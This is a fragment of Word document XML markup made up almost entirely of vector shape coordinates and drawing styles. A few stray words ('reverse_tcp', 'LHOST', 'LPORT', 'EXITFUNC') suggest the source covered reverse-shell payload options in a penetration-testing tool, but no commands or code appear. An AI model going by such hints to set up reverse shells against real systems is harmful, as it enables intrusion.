        <v:shape style="position:absolute;left:5290;top:9030;width:130;height:250" coordorigin="5290,9030" coordsize="130,250" path="m5307,9044l5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5307,9044,5308,9044,5308,9044,5308,9044,5308,9044,5308,9044,5308,9044,5308,9044,5309,9044,5309,9044,5309,9044,5309,9044,5309,9044,5310,9044,5310,9044,5310,9044,5311,9044,5311,9044,5311,9044,5312,9044,5312,9044,5312,9044,5313,9044,5313,9044,5314,9044,5314,9044,5315,9044,5315,9044,5316,9044,5316,9044,5317,9044,5317,9044,5318,9044,5319,9044,5319,9044,5320,9044,5321,9044,5321,9044,5322,9044,5323,9044,5324,9044,5324,9044,5325,9044,5326,9044,5327,9044,5328,9044,5329,9044,5330,9044,5331,9044,5332,9044,5333,9044,5334,9044,5336,9044,5337,9044,5338,9044,5339,9044,5340,9044,5342,9044,5343,9044,5345,9044,5346,9044,5347,9044,5349,9044,5350,9044,5352,9044,5354,9044,5355,9044,5357,9044,5359,9044,5360,9044,5362,9044,5364,9044,5366,9044,5368,9044,5370,9044,5372,9044,5374,9044,5376,9044,5378,9044,5380,9044,5382,9044,5385,9044,5387,9044,5389,9044,5392,9044,5394,9044,5396,9044,5399,9044,5402,9044,5404,9044,5407,9044,5409,9044,5412,9044,5415,9044,5418,9044,5421,9044,5424,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9044,5427,9045,5427,9045,5427,9045,5427,9045,5427,9045,5427,9046,5427,9046,5427,9046,5427,9047,5427,9047,5427,9047,5427,9048,5427,9048,5427,9049,5427,9049,5427,9050,5427,9050,5427,9051,5427,9051,5427,9052,5427,9053,5427,9053,5427,9054,5427,9055,5427,9056,5427,9056,5427,9057,5427,9058,5427,9059,5427,9060,5427,9061,5427,9062,5427,9064,5427,9065,5427,9066,5427,9067,5427,9069,5427,9070,5427,9072,5427,9073,5427,9075,5427,9076,5427,9078,5427,9080,5427,9081,5427,9083,5427,9085,5427,9087,5427,9089,5427,9091,5427,9093,5427,9095,5427,9098,5427,9100,5427,9102,5427,9105,5427,9107,5427,9110,5427,9113,5427,9115,5427,9118,5427,9121,5427,9124,5427,9127,5427,9130,5427,9133,5427,9137,5427,9140,5427,9143,5427,9147,5427,9150,5427,9154,5427,9158,5427,9161,5427,9165,5427,9169,5427,9173,5427,9178,5427,9182,5427,9186,5427,9190,5427,9195,5427,9200,5427,9204,5427,9209,5427,9214,5427,9219,5427,9224,5427,9229,5427,9234,5427,9240,5427,9245,5427,9251,5427,9256,5427,9262,5427,9268,5427,9274,5427,9280,5427,9286,5427,9292,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5427,9299,5426,9299,5426,9299,5426,9299,5426,9299,5426,9299,5426,9299,5426,9299,5426,9299,5426,9299,5426,9299,5426,9299,5425,9299,5425,9299,5425,9299,5425,9299,5425,9299,5425,9299,5424,9299,5424,9299,5424,9299,5424,9299,5423,9299,5423,9299,5423,9299,5423,9299,5422,9299,5422,9299,5421,9299,5421,9299,5421,9299,5420,9299,5420,9299,5419,9299,5419,9299,5418,9299,5418,9299,5417,9299,5417,9299,5416,9299,5416,9299,5415,9299,5414,9299,5414,9299,5413,9299,5412,9299,5411,9299,5411,9299,5410,9299,5409,9299,5408,9299,5407,9299,5406,9299,5405,9299,5404,9299,5403,9299,5402,9299,5401,9299,5400,9299,5399,9299,5398,9299,5397,9299,5395,9299,5394,9299,5393,9299,5392,9299,5390,9299,5389,9299,5387,9299,5386,9299,5385,9299,5383,9299,5381,9299,5380,9299,5378,9299,5377,9299,5375,9299,5373,9299,5371,9299,5369,9299,5368,9299,5366,9299,5364,9299,5362,9299,5360,9299,5358,9299,5355,9299,5353,9299,5351,9299,5349,9299,5347,9299,5344,9299,5342,9299,5339,9299,5337,9299,5334,9299,5332,9299,5329,9299,5327,9299,5324,9299,5321,9299,5318,9299,5316,9299,5313,9299,5310,9299,5307,9299,5307,9299,5307,9299,5307,9299,5307,9299,5307,9299,5307,9299,5307,9299,5307,9299,5307,9299,5307,9299,5307,9299,5307,9298,5307,9298,5307,9298,5307,9298,5307,9298,5307,9298,5307,9298,5307,9298,5307,9298,5307,9297,5307,9297,5307,9297,5307,9297,5307,9297,5307,9296,5307,9296,5307,9296,5307,9295,5307,9295,5307,9295,5307,9294,5307,9294,5307,9293,5307,9293,5307,9292,5307,9292,5307,9291,5307,9290,5307,9290,5307,9289,5307,9288,5307,9287,5307,9287,5307,9286,5307,9285,5307,9284,5307,9283,5307,9282,5307,9281,5307,9280,5307,9279,5307,9277,5307,9276,5307,9275,5307,9273,5307,9272,5307,9271,5307,9269,5307,9268,5307,9266,5307,9264,5307,9263,5307,9261,5307,9259,5307,9257,5307,9255,5307,9253,5307,9251,5307,9249,5307,9247,5307,9244,5307,9242,5307,9240,5307,9237,5307,9235,5307,9232,5307,9230,5307,9227,5307,9224,5307,9221,5307,9218,5307,9215,5307,9212,5307,9209,5307,9206,5307,9202,5307,9199,5307,9196,5307,9192,5307,9188,5307,9185,5307,9181,5307,9177,5307,9173,5307,9169,5307,9165,5307,9161,5307,9156,5307,9152,5307,9147,5307,9143,5307,9138,5307,9133,5307,9128,5307,9123,5307,9118,5307,9113,5307,9108,5307,9103,5307,9097,5307,9092,5307,9086,5307,9080,5307,9074,5307,9068,5307,9062,5307,9056,5307,9050,5307,9044e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:486.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,9730" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:9730;width:130;height:270" coordorigin="2170,9730" coordsize="130,270" path="m2185,9749l2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2185,9749,2186,9749,2186,9749,2186,9749,2186,9749,2186,9749,2186,9749,2186,9749,2186,9749,2186,9749,2187,9749,2187,9749,2187,9749,2187,9749,2187,9749,2187,9749,2188,9749,2188,9749,2188,9749,2188,9749,2189,9749,2189,9749,2189,9749,2190,9749,2190,9749,2190,9749,2191,9749,2191,9749,2192,9749,2192,9749,2192,9749,2193,9749,2193,9749,2194,9749,2195,9749,2195,9749,2196,9749,2196,9749,2197,9749,2198,9749,2198,9749,2199,9749,2200,9749,2200,9749,2201,9749,2202,9749,2203,9749,2204,9749,2205,9749,2206,9749,2207,9749,2208,9749,2209,9749,2210,9749,2211,9749,2212,9749,2213,9749,2214,9749,2215,9749,2216,9749,2218,9749,2219,9749,2220,9749,2222,9749,2223,9749,2224,9749,2226,9749,2227,9749,2229,9749,2230,9749,2232,9749,2234,9749,2235,9749,2237,9749,2239,9749,2241,9749,2242,9749,2244,9749,2246,9749,2248,9749,2250,9749,2252,9749,2254,9749,2256,9749,2259,9749,2261,9749,2263,9749,2265,9749,2268,9749,2270,9749,2272,9749,2275,9749,2277,9749,2280,9749,2283,9749,2285,9749,2288,9749,2291,9749,2293,9749,2296,9749,2299,9749,2302,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9749,2305,9750,2305,9750,2305,9750,2305,9750,2305,9750,2305,9750,2305,9751,2305,9751,2305,9751,2305,9751,2305,9752,2305,9752,2305,9752,2305,9753,2305,9753,2305,9753,2305,9754,2305,9754,2305,9755,2305,9755,2305,9756,2305,9757,2305,9757,2305,9758,2305,9759,2305,9759,2305,9760,2305,9761,2305,9762,2305,9763,2305,9764,2305,9765,2305,9766,2305,9767,2305,9768,2305,9769,2305,9770,2305,9771,2305,9773,2305,9774,2305,9775,2305,9777,2305,9778,2305,9780,2305,9782,2305,9783,2305,9785,2305,9787,2305,9789,2305,9790,2305,9792,2305,9794,2305,9797,2305,9799,2305,9801,2305,9803,2305,9805,2305,9808,2305,9810,2305,9813,2305,9815,2305,9818,2305,9821,2305,9824,2305,9826,2305,9829,2305,9832,2305,9835,2305,9839,2305,9842,2305,9845,2305,9849,2305,9852,2305,9856,2305,9859,2305,9863,2305,9867,2305,9871,2305,9875,2305,9879,2305,9883,2305,9887,2305,9891,2305,9896,2305,9900,2305,9905,2305,9910,2305,9914,2305,9919,2305,9924,2305,9929,2305,9934,2305,9940,2305,9945,2305,9950,2305,9956,2305,9962,2305,9967,2305,9973,2305,9979,2305,9985,2305,9991,2305,9998,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2305,10004,2304,10004,2304,10004,2304,10004,2304,10004,2304,10004,2304,10004,2304,10004,2303,10004,2303,10004,2303,10004,2303,10004,2303,10004,2302,10004,2302,10004,2302,10004,2302,10004,2301,10004,2301,10004,2301,10004,2300,10004,2300,10004,2299,10004,2299,10004,2299,10004,2298,10004,2298,10004,2297,10004,2297,10004,2296,10004,2296,10004,2295,10004,2295,10004,2294,10004,2293,10004,2293,10004,2292,10004,2291,10004,2291,10004,2290,10004,2289,10004,2288,10004,2287,10004,2286,10004,2286,10004,2285,10004,2284,10004,2283,10004,2282,10004,2281,10004,2280,10004,2279,10004,2277,10004,2276,10004,2275,10004,2274,10004,2273,10004,2271,10004,2270,10004,2269,10004,2267,10004,2266,10004,2264,10004,2263,10004,2261,10004,2260,10004,2258,10004,2257,10004,2255,10004,2253,10004,2251,10004,2250,10004,2248,10004,2246,10004,2244,10004,2242,10004,2240,10004,2238,10004,2236,10004,2234,10004,2232,10004,2230,10004,2227,10004,2225,10004,2223,10004,2220,10004,2218,10004,2215,10004,2213,10004,2210,10004,2208,10004,2205,10004,2202,10004,2200,10004,2197,10004,2194,10004,2191,10004,2188,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10004,2185,10003,2185,10003,2185,10003,2185,10003,2185,10003,2185,10003,2185,10002,2185,10002,2185,10002,2185,10002,2185,10001,2185,10001,2185,10001,2185,10000,2185,10000,2185,10000,2185,9999,2185,9999,2185,9998,2185,9998,2185,9997,2185,9996,2185,9996,2185,9995,2185,9994,2185,9994,2185,9993,2185,9992,2185,9991,2185,9990,2185,9989,2185,9988,2185,9987,2185,9986,2185,9985,2185,9984,2185,9983,2185,9981,2185,9980,2185,9979,2185,9977,2185,9976,2185,9975,2185,9973,2185,9971,2185,9970,2185,9968,2185,9966,2185,9964,2185,9962,2185,9961,2185,9959,2185,9956,2185,9954,2185,9952,2185,9950,2185,9948,2185,9945,2185,9943,2185,9940,2185,9938,2185,9935,2185,9932,2185,9929,2185,9927,2185,9924,2185,9921,2185,9917,2185,9914,2185,9911,2185,9908,2185,9904,2185,9901,2185,9897,2185,9894,2185,9890,2185,9886,2185,9882,2185,9878,2185,9874,2185,9870,2185,9866,2185,9862,2185,9857,2185,9853,2185,9848,2185,9843,2185,9839,2185,9834,2185,9829,2185,9824,2185,9819,2185,9813,2185,9808,2185,9803,2185,9797,2185,9791,2185,9786,2185,9780,2185,9774,2185,9768,2185,9762,2185,9755,2185,9749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79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8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38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reverse_tcp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EXITFUNC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process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Exit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technique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Accepted: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seh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ss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none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LHOST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ed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331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="626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LPORT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94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target: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6e7f8f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58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Wildcard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23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24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542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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="386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28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8.874pt;margin-top:365.874pt;width:4.125pt;height:31.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,7317" coordsize="82,622">
        <v:shape style="position:absolute;left:1177;top:7317;width:82;height:622" coordorigin="1177,7317" coordsize="82,622" path="m1217,7318l1217,7318,1217,7318,1217,7318,1217,7318,1217,7318,1217,7318,1217,7318,1217,7318,1217,7318,1217,7318,1217,7318,1217,7318,1217,7318,1217,7318,1217,7319,1217,7319,1217,7319,1217,7319,1217,7320,1217,7320,1217,7321,1217,7321,1217,7321,1217,7322,1217,7323,1217,7323,1217,7324,1217,7325,1217,7326,1217,7326,1217,7327,1217,7328,1217,7329,1217,7330,1217,7332,1217,7333,1217,7334,1217,7336,1217,7337,1217,7339,1217,7340,1217,7342,1217,7344,1217,7346,1217,7348,1217,7350,1217,7352,1217,7355,1217,7357,1217,7360,1217,7362,1217,7365,1217,7368,1217,7371,1217,7374,1217,7377,1217,7380,1217,7384,1217,7387,1217,7391,1217,7395,1217,7399,1217,7403,1217,7407,1217,7411,1217,7416,1217,7420,1217,7425,1217,7430,1217,7435,1217,7440,1217,7445,1217,7451,1217,7456,1217,7462,1217,7468,1217,7474,1217,7480,1217,7487,1217,7493,1217,7500,1217,7507,1217,7514,1217,7521,1217,7529,1217,7536,1217,7544,1217,7552,1217,7560,1217,7569,1217,7577,1217,7586,1217,7595,1217,7604,1217,7614,1217,7623,1217,7633,1217,7643,1217,7653,1217,7663,1217,7674,1217,7685,1217,7696,1217,7707,1217,7718,1217,7730,1217,7742,1217,7754,1217,7766,1217,7779,1217,7792,1217,7805,1217,7818,1217,7832,1217,7845,1217,7859,1217,7874,1217,7888,1217,7903,1217,7918e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:518.874pt;margin-top:521.874pt;width:1.125pt;height:232.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10377,10437" coordsize="22,4642">
        <v:shape style="position:absolute;left:10377;top:10437;width:22;height:4642" coordorigin="10377,10437" coordsize="22,4642" path="m10402,10469l10402,10469,10402,10469,10402,10469,10402,10469,10402,10469,10402,10470,10402,10470,10402,10470,10402,10471,10402,10471,10402,10472,10402,10473,10402,10474,10402,10475,10402,10477,10402,10479,10402,10481,10402,10483,10402,10485,10402,10488,10402,10491,10402,10495,10402,10498,10402,10503,10402,10507,10402,10512,10402,10517,10402,10523,10402,10529,10402,10536,10402,10543,10402,10551,10402,10559,10402,10568,10402,10577,10402,10587,10402,10597,10402,10608,10402,10620,10402,10632,10402,10645,10402,10658,10402,10672,10402,10687,10402,10703,10402,10719,10402,10736,10402,10754,10402,10773,10402,10792,10402,10812,10402,10833,10402,10855,10402,10878,10402,10901,10402,10926,10402,10951,10402,10977,10402,11004,10402,11033,10402,11062,10402,11092,10402,11123,10402,11155,10402,11188,10402,11223,10402,11258,10402,11294,10402,11332,10402,11370,10402,11410,10402,11451,10402,11493,10402,11536,10402,11581,10402,11626,10402,11673,10402,11722,10402,11771,10402,11822,10402,11874,10402,11927,10402,11982,10402,12038,10402,12095,10402,12154,10402,12214,10402,12276,10402,12339,10402,12403,10402,12469,10402,12536,10402,12605,10402,12676,10402,12748,10402,12821,10402,12896,10402,12973,10402,13051,10402,13131,10402,13212,10402,13295,10402,13380,10402,13467,10402,13555,10402,13645,10402,13736,10402,13830,10402,13925,10402,14021,10402,14120,10402,14221,10402,14323,10402,14427,10402,14533,10402,14641,10402,14751,10402,14862,10402,14976,10402,15092e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:521.874pt;width:450.125pt;height:20.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,10437" coordsize="9002,402">
        <v:shape style="position:absolute;left:1477;top:10437;width:9002;height:402" coordorigin="1477,10437" coordsize="9002,402" path="m1510,10469l1510,10469,1510,10469,1510,10469,1510,10469,1510,10469,1510,10469,1511,10469,1512,10469,1512,10469,1514,10469,1515,10469,1517,10469,1519,10469,1521,10469,1524,10469,1528,10469,1532,10469,1536,10469,1541,10469,1546,10469,1552,10469,1559,10469,1566,10469,1575,10469,1583,10469,1593,10469,1603,10469,1615,10469,1627,10469,1640,10469,1654,10469,1668,10469,1684,10469,1701,10469,1719,10469,1738,10469,1758,10469,1780,10469,1802,10469,1826,10469,1851,10469,1877,10469,1904,10469,1933,10469,1963,10469,1995,10469,2028,10469,2063,10469,2099,10469,2136,10469,2175,10469,2216,10469,2259,10469,2303,10469,2348,10469,2396,10469,2445,10469,2496,10469,2549,10469,2604,10469,2660,10469,2719,10469,2779,10469,2841,10469,2906,10469,2972,10469,3041,10469,3112,10469,3184,10469,3259,10469,3336,10469,3416,10469,3498,10469,3582,10469,3668,10469,3757,10469,3848,10469,3941,10469,4037,10469,4136,10469,4236,10469,4340,10469,4446,10469,4555,10469,4666,10469,4780,10469,4897,10469,5017,10469,5139,10469,5264,10469,5392,10469,5523,10469,5657,10469,5793,10469,5933,10469,6076,10469,6222,10469,6370,10469,6522,10469,6677,10469,6835,10469,6997,10469,7161,10469,7329,10469,7500,10469,7675,10469,7853,10469,8034,10469,8219,10469,8407,10469,8598,10469,8793,10469,8992,10469,9194,10469,9400,10469,9609,10469,9823,10469,10039,10469,10260,10469,10484,10469,10484,10469,10484,10469,10484,10469,10484,10469,10484,10469,10484,10469,10484,10469,10484,10469,10484,10469,10484,10469,10484,10470,10484,10470,10484,10470,10484,10470,10484,10470,10484,10470,10484,10470,10484,10470,10484,10471,10484,10471,10484,10471,10484,10471,10484,10472,10484,10472,10484,10472,10484,10473,10484,10473,10484,10474,10484,10474,10484,10475,10484,10476,10484,10476,10484,10477,10484,10478,10484,10478,10484,10479,10484,10480,10484,10481,10484,10482,10484,10483,10484,10484,10484,10485,10484,10486,10484,10488,10484,10489,10484,10490,10484,10492,10484,10493,10484,10495,10484,10497,10484,10498,10484,10500,10484,10502,10484,10504,10484,10506,10484,10508,10484,10510,10484,10512,10484,10514,10484,10517,10484,10519,10484,10522,10484,10524,10484,10527,10484,10530,10484,10533,10484,10536,10484,10539,10484,10542,10484,10545,10484,10549,10484,10552,10484,10556,10484,10559,10484,10563,10484,10567,10484,10571,10484,10575,10484,10579,10484,10583,10484,10588,10484,10592,10484,10597,10484,10602,10484,10607,10484,10611,10484,10617,10484,10622,10484,10627,10484,10633,10484,10638,10484,10644,10484,10650,10484,10656,10484,10662,10484,10668,10484,10674,10484,10681,10484,10687,10484,10694,10484,10701,10484,10708,10484,10715,10484,10722,10484,10730,10484,10737,10484,10745,10484,10753,10484,10761,10484,10769,10484,10777,10484,10786,10484,10795,10484,10803,10484,10812,10484,10821,10484,10831,10484,10840,10484,10850,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10483,10859,10482,10859,10482,10859,10480,10859,10479,10859,10477,10859,10475,10859,10473,10859,10470,10859,10466,10859,10462,10859,10458,10859,10453,10859,10448,10859,10442,10859,10435,10859,10428,10859,10419,10859,10411,10859,10401,10859,10391,10859,10379,10859,10367,10859,10354,10859,10340,10859,10326,10859,10310,10859,10293,10859,10275,10859,10256,10859,10236,10859,10215,10859,10192,10859,10168,10859,10143,10859,10117,10859,10090,10859,10061,10859,10031,10859,9999,10859,9966,10859,9931,10859,9895,10859,9858,10859,9819,10859,9778,10859,9735,10859,9691,10859,9646,10859,9598,10859,9549,10859,9498,10859,9445,10859,9391,10859,9334,10859,9275,10859,9215,10859,9153,10859,9088,10859,9022,10859,8953,10859,8883,10859,8810,10859,8735,10859,8658,10859,8578,10859,8497,10859,8413,10859,8326,10859,8238,10859,8146,10859,8053,10859,7957,10859,7859,10859,7758,10859,7654,10859,7548,10859,7439,10859,7328,10859,7214,10859,7097,10859,6977,10859,6855,10859,6730,10859,6602,10859,6471,10859,6337,10859,6201,10859,6061,10859,5918,10859,5773,10859,5624,10859,5472,10859,5317,10859,5159,10859,4997,10859,4833,10859,4665,10859,4494,10859,4319,10859,4141,10859,3960,10859,3776,10859,3587,10859,3396,10859,3201,10859,3002,10859,2800,10859,2594,10859,2385,10859,2172,10859,1955,10859,1734,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10858,1510,10858,1510,10858,1510,10858,1510,10857,1510,10857,1510,10857,1510,10856,1510,10856,1510,10855,1510,10855,1510,10854,1510,10854,1510,10853,1510,10853,1510,10852,1510,10851,1510,10850,1510,10850,1510,10849,1510,10848,1510,10847,1510,10846,1510,10845,1510,10844,1510,10842,1510,10841,1510,10840,1510,10838,1510,10837,1510,10835,1510,10834,1510,10832,1510,10831,1510,10829,1510,10827,1510,10825,1510,10823,1510,10821,1510,10819,1510,10817,1510,10814,1510,10812,1510,10809,1510,10807,1510,10804,1510,10802,1510,10799,1510,10796,1510,10793,1510,10790,1510,10787,1510,10783,1510,10780,1510,10777,1510,10773,1510,10769,1510,10766,1510,10762,1510,10758,1510,10754,1510,10750,1510,10745,1510,10741,1510,10736,1510,10732,1510,10727,1510,10722,1510,10717,1510,10712,1510,10707,1510,10702,1510,10696,1510,10691,1510,10685,1510,10679,1510,10673,1510,10667,1510,10661,1510,10655,1510,10648,1510,10642,1510,10635,1510,10628,1510,10621,1510,10614,1510,10606,1510,10599,1510,10591,1510,10584,1510,10576,1510,10568,1510,10560,1510,10551,1510,10543,1510,10534,1510,10525,1510,10516,1510,10507,1510,10498,1510,10489,1510,10479,1510,10469e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:522.600pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:540.874pt;width:450.125pt;height:18.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,10817" coordsize="9002,362">
        <v:shape style="position:absolute;left:1477;top:10817;width:9002;height:362" coordorigin="1477,10817" coordsize="9002,362" path="m1510,10859l1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1510,10859,1511,10859,1512,10859,1512,10859,1514,10859,1515,10859,1517,10859,1519,10859,1521,10859,1524,10859,1528,10859,1532,10859,1536,10859,1541,10859,1546,10859,1552,10859,1559,10859,1566,10859,1575,10859,1583,10859,1593,10859,1603,10859,1615,10859,1627,10859,1640,10859,1654,10859,1668,10859,1684,10859,1701,10859,1719,10859,1738,10859,1758,10859,1780,10859,1802,10859,1826,10859,1851,10859,1877,10859,1904,10859,1933,10859,1963,10859,1995,10859,2028,10859,2063,10859,2099,10859,2136,10859,2175,10859,2216,10859,2259,10859,2303,10859,2348,10859,2396,10859,2445,10859,2496,10859,2549,10859,2604,10859,2660,10859,2719,10859,2779,10859,2841,10859,2906,10859,2972,10859,3041,10859,3112,10859,3184,10859,3259,10859,3336,10859,3416,10859,3498,10859,3582,10859,3668,10859,3757,10859,3848,10859,3941,10859,4037,10859,4136,10859,4236,10859,4340,10859,4446,10859,4555,10859,4666,10859,4780,10859,4897,10859,5017,10859,5139,10859,5264,10859,5392,10859,5523,10859,5657,10859,5793,10859,5933,10859,6076,10859,6222,10859,6370,10859,6522,10859,6677,10859,6835,10859,6997,10859,7161,10859,7329,10859,7500,10859,7675,10859,7853,10859,8034,10859,8219,10859,8407,10859,8598,10859,8793,10859,8992,10859,9194,10859,9400,10859,9609,10859,9823,10859,10039,10859,10260,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10859,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10860,10484,10861,10484,10861,10484,10861,10484,10861,10484,10862,10484,10862,10484,10862,10484,10863,10484,10863,10484,10863,10484,10864,10484,10864,10484,10865,10484,10865,10484,10866,10484,10867,10484,10867,10484,10868,10484,10869,10484,10869,10484,10870,10484,10871,10484,10872,10484,10873,10484,10874,10484,10875,10484,10876,10484,10877,10484,10879,10484,10880,10484,10881,10484,10883,10484,10884,10484,10885,10484,10887,10484,10889,10484,10890,10484,10892,10484,10894,10484,10896,10484,10898,10484,10900,10484,10902,10484,10904,10484,10906,10484,10908,10484,10911,10484,10913,10484,10916,10484,10918,10484,10921,10484,10924,10484,10927,10484,10930,10484,10933,10484,10936,10484,10939,10484,10942,10484,10945,10484,10949,10484,10952,10484,10956,10484,10960,10484,10964,10484,10967,10484,10971,10484,10976,10484,10980,10484,10984,10484,10988,10484,10993,10484,10998,10484,11002,10484,11007,10484,11012,10484,11017,10484,11022,10484,11027,10484,11033,10484,11038,10484,11044,10484,11050,10484,11055,10484,11061,10484,11067,10484,11074,10484,11080,10484,11086,10484,11093,10484,11099,10484,11106,10484,11113,10484,11120,10484,11127,10484,11135,10484,11142,10484,11150,10484,11157,10484,11165,10484,11173,10484,11181,10484,11190,10484,11190,10484,11190,10484,11190,10484,11190,10484,11190,10484,11190,10483,11190,10482,11190,10482,11190,10480,11190,10479,11190,10477,11190,10475,11190,10473,11190,10470,11190,10466,11190,10462,11190,10458,11190,10453,11190,10448,11190,10442,11190,10435,11190,10428,11190,10419,11190,10411,11190,10401,11190,10391,11190,10379,11190,10367,11190,10354,11190,10340,11190,10326,11190,10310,11190,10293,11190,10275,11190,10256,11190,10236,11190,10215,11190,10192,11190,10168,11190,10143,11190,10117,11190,10090,11190,10061,11190,10031,11190,9999,11190,9966,11190,9931,11190,9895,11190,9858,11190,9819,11190,9778,11190,9735,11190,9691,11190,9646,11190,9598,11190,9549,11190,9498,11190,9445,11190,9391,11190,9334,11190,9275,11190,9215,11190,9153,11190,9088,11190,9022,11190,8953,11190,8883,11190,8810,11190,8735,11190,8658,11190,8578,11190,8497,11190,8413,11190,8326,11190,8238,11190,8146,11190,8053,11190,7957,11190,7859,11190,7758,11190,7654,11190,7548,11190,7439,11190,7328,11190,7214,11190,7097,11190,6977,11190,6855,11190,6730,11190,6602,11190,6471,11190,6337,11190,6201,11190,6061,11190,5918,11190,5773,11190,5624,11190,5472,11190,5317,11190,5159,11190,4997,11190,4833,11190,4665,11190,4494,11190,4319,11190,4141,11190,3960,11190,3776,11190,3587,11190,3396,11190,3201,11190,3002,11190,2800,11190,2594,11190,2385,11190,2172,11190,1955,11190,1734,11190,1510,11190,1510,11190,1510,11190,1510,11190,1510,11190,1510,11190,1510,11190,1510,11190,1510,11190,1510,11190,1510,11189,1510,11189,1510,11189,1510,11189,1510,11189,1510,11189,1510,11189,1510,11189,1510,11189,1510,11188,1510,11188,1510,11188,1510,11188,1510,11188,1510,11187,1510,11187,1510,11187,1510,11186,1510,11186,1510,11185,1510,11185,1510,11184,1510,11184,1510,11183,1510,11183,1510,11182,1510,11181,1510,11180,1510,11180,1510,11179,1510,11178,1510,11177,1510,11176,1510,11175,1510,11174,1510,11173,1510,11172,1510,11171,1510,11169,1510,11168,1510,11167,1510,11165,1510,11164,1510,11162,1510,11160,1510,11159,1510,11157,1510,11155,1510,11153,1510,11151,1510,11149,1510,11147,1510,11145,1510,11143,1510,11141,1510,11138,1510,11136,1510,11133,1510,11131,1510,11128,1510,11125,1510,11122,1510,11120,1510,11117,1510,11113,1510,11110,1510,11107,1510,11104,1510,11100,1510,11097,1510,11093,1510,11089,1510,11086,1510,11082,1510,11078,1510,11074,1510,11069,1510,11065,1510,11061,1510,11056,1510,11052,1510,11047,1510,11042,1510,11037,1510,11032,1510,11027,1510,11022,1510,11016,1510,11011,1510,11005,1510,11000,1510,10994,1510,10988,1510,10982,1510,10976,1510,10969,1510,10963,1510,10956,1510,10950,1510,10943,1510,10936,1510,10929,1510,10922,1510,10914,1510,10907,1510,10899,1510,10892,1510,10884,1510,10876,1510,10868,1510,10859e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:541.874pt;width:2.125pt;height:17.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,10837" coordsize="42,342">
